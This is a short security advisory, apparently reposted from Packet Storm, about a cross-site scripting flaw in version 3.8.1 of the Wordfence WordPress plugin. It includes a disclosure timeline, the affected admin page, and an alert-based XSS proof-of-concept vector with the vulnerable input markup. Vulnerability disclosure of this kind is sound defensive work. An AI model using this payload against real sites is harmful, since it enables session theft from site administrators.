WordPress Wordfence plugin version 3.8.1 suffers from a cross site scripting vulnerability.
84f47098edb58f873d521d1faef7d8dc# Exploit Title: Wordpress Plugin Wordfence 3.8.1 - Cross Site Scripting
# Date: 28 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://www.wordfence.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 3.8.1 & Anteriores.
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: All team WebSecuritydev, SeguridadBlanca (Dedalo)
http://seguridadblanca.in/
###########################################################################################
Timeline:
- 21 De agosto XSS Encontrado y Reportado.
- 27 de Agosto Reponden y Confirman Vulnerabilidad
- 28 De Agosto Publican Parche de Vulnerabilidad.
- 28 de Agosto Divulgacion y Hago publica la vulnerabilidad.
Changelog: http://wordpress.org/plugins/wordfence/changelog/
###########################################################################################
Affected items - Archivos Afectados.
http://localhost/wordpress/wp-admin/admin.php?page=WordfenceWhois
Prueba de Concepto PoC:
Vector: "><svg/onload=alert(/Dylan/)>
Input: <input id="wfwhois" type="text" onkeydown="if(event.keyCode == 13){
WFAD.whois(jQuery('#wfwhois').val()); }"
maxlength="255" size="40" value="" name="whois">
###########################################################################################
--
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*
© 2015 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!